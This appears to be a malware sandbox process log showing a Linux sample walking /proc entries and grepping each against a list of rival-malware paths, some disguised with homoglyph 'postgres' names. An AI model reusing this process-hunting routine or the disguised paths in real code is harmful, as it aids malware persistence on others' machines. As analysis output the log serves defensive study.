/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1034
-
-
/bin/grepgrep exe2⤵PID:1038
-
-
/bin/lsls -latrh /proc/7132⤵PID:1037
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1041
-
-
/bin/grepgrep exe2⤵PID:1045
-
-
/bin/lsls -latrh /proc/7182⤵PID:1044
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1048
-
-
/bin/lsls -latrh /proc/722⤵PID:1050
-
-
/bin/grepgrep exe2⤵PID:1051
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1054
-
-
/bin/grepgrep exe2⤵PID:1058
-
-
/bin/lsls -latrh /proc/7292⤵PID:1057
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1062
-
-
/bin/grepgrep exe2⤵PID:1065
-
-
/bin/lsls -latrh /proc/732⤵PID:1064
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1068
-
-
/bin/grepgrep exe2⤵PID:1073
-
-
/bin/lsls -latrh /proc/742⤵PID:1072
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1077
-
-
/bin/grepgrep exe2⤵PID:1081
-
-
/bin/lsls -latrh /proc/752⤵PID:1080
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1083
-
-
/bin/grepgrep exe2⤵PID:1087
-
-
/bin/lsls -latrh /proc/762⤵PID:1086
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1090
-
-
/bin/grepgrep exe2⤵PID:1094
-
-
/bin/lsls -latrh /proc/772⤵PID:1093
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1097
-
-
/bin/grepgrep exe2⤵PID:1101
-
-
/bin/lsls -latrh /proc/782⤵PID:1100
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1104
-
-
/bin/grepgrep exe2⤵PID:1107
-
-
/bin/lsls -latrh /proc/792⤵PID:1106
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1109
-
-
/bin/grepgrep exe2⤵PID:1112
-
-
/bin/lsls -latrh /proc/82⤵PID:1111
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1115
-
-
/bin/lsls -latrh /proc/822⤵PID:1117
-
-
/bin/grepgrep exe2⤵PID:1118
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1120
-
-
/bin/grepgrep exe2⤵PID:1123
-
-
/bin/lsls -latrh /proc/92⤵PID:1122
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1125
-
-
/bin/grepgrep exe2⤵PID:1128
-
-
/bin/lsls -latrh /proc/buddyinfo2⤵PID:1127
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1130
-
-
/bin/grepgrep exe2⤵PID:1133
-
-
/bin/lsls -latrh /proc/bus2⤵PID:1132
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1135
-
-
/bin/grepgrep exe2⤵PID:1138
-
-
/bin/lsls -latrh /proc/cgroups2⤵PID:1137
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1140
-
-
/bin/grepgrep exe2⤵PID:1143
-
-
/bin/lsls -latrh /proc/cmdline2⤵PID:1142
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1145
-
-
/bin/grepgrep exe2⤵PID:1148
-
-
/bin/lsls -latrh /proc/consoles2⤵PID:1147
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1150
-
-
/bin/grepgrep exe2⤵PID:1153
-
-
/bin/lsls -latrh /proc/cpuinfo2⤵PID:1152
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1155
-
-
/bin/grepgrep exe2⤵PID:1158
-
-
/bin/lsls -latrh /proc/crypto2⤵PID:1157
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1160
-
-
/bin/grepgrep exe2⤵PID:1163
-
-
/bin/lsls -latrh /proc/devices2⤵PID:1162
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1165
-
-
/bin/grepgrep exe2⤵PID:1168
-
-
/bin/lsls -latrh /proc/device-tree2⤵PID:1167
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1170
-
-
/bin/grepgrep exe2⤵PID:1173
-
-
/bin/lsls -latrh /proc/diskstats2⤵PID:1172
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1175
-
-
/bin/grepgrep exe2⤵PID:1178
-
-
/bin/lsls -latrh /proc/dma2⤵PID:1177
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1180
-
-
/bin/grepgrep exe2⤵PID:1183
-
-
/bin/lsls -latrh /proc/driver2⤵PID:1182
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1185
-
-
/bin/grepgrep exe2⤵PID:1188
-
-
/bin/lsls -latrh /proc/execdomains2⤵PID:1187
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1190
-
-
/bin/grepgrep exe2⤵PID:1196
-
-
/bin/lsls -latrh /proc/fb2⤵PID:1195
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1198
-
-
/bin/grepgrep exe2⤵PID:1201
-
-
/bin/lsls -latrh /proc/filesystems2⤵PID:1200
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1203
-
-
/bin/grepgrep exe2⤵PID:1206
-
-
/bin/lsls -latrh /proc/fs2⤵PID:1205
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1208
-
-
/bin/grepgrep exe2⤵PID:1211
-
-
/bin/lsls -latrh /proc/interrupts2⤵PID:1210
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1213
-
-
/bin/lsls -latrh /proc/iomem2⤵PID:1215
-
-
/bin/grepgrep exe2⤵PID:1216
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1218
-
-
/bin/lsls -latrh /proc/ioports2⤵PID:1220
-
-
/bin/grepgrep exe2⤵PID:1221
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1223
-
-
/bin/grepgrep exe2⤵PID:1226
-
-
/bin/lsls -latrh /proc/irq2⤵PID:1225
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1228
-
-
/bin/grepgrep exe2⤵PID:1231
-
-
/bin/lsls -latrh /proc/kallsyms2⤵PID:1230
-
-
